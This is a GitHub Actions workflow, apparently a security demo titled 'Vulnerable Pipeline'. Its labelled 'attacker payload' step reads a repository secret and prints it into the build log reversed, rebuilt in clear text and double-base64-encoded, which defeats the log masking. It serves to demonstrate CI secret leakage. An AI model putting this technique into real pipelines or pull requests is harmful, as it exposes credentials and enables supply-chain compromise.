name: Vulnerable Pipeline

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  build:
    runs-on: ubuntu-latest

    env:
      DEMO_SECRET: ${{ secrets.DEMO_SECRET }}

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Normal step
        run: echo "Pipeline started"
      - name:  Étape compromise
        shell: bash
        run: |
            echo ""
            echo "===== ⚠️ ATTACKER PAYLOAD ACTIVÉ ====="
            echo "[Attacker] Lecture de la variable d'environnement..."
        
            # Printed reversed (NOT masked)
            rev_secret=$(echo -n "$DEMO_SECRET" | rev)
            echo "[Attacker] Secret exfiltré (reversed) : $rev_secret"
        
            # Print original (this time NOT masked because it's reconstructed)
            original=$(echo -n "$rev_secret" | rev)
            echo "[Attacker] Secret reconstruit en clair : $original"
        
            echo ""
            echo "[Attacker] Double encodage Base64 :"
            encoded=$(echo -n "$original" | base64 | base64)
            echo "$encoded"
        
            echo ""
            echo "[Attacker] Décodage du double Base64 :"
            echo "$encoded" | base64 --decode | base64 --decode
        
            echo "===== ⚠️ FIN DU PAYLOAD ====="
        env:
            DEMO_SECRET: ${{ secrets.DEMO_SECRET }}

